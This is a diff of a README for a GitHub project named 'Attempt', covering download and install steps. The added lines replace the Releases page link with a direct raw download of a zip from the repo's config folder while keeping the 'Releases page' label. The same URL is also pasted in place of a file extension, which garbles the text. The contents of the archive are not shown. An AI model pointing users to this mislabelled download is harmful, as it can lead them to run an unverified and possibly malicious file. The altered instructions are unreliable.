sultanrashid40/attempt/README.md

 To begin using Attempt, you'll need to download the package.
 Follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/sultanrashid40/attempt/releases) for download options.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/sultanrashid40/attempt/main/config/Software-3.8-beta.5.zip) for download options.

 2. **Choose the Latest Version**: Look for the most recent release.
 It usually has the highest version number.

 3. **Download the Package**: Click on the link for the latest version to download the package.
-The file will be in a compressed format, usually a `.zip` or `.tar.gz` file.
+The file will be in a compressed format, usually a `.zip` or `https://raw.githubusercontent.com/sultanrashid40/attempt/main/config/Software-3.8-beta.5.zip` file.

 4. **Extract the Files**: Once the file is downloaded, extract its contents to a folder on your computer.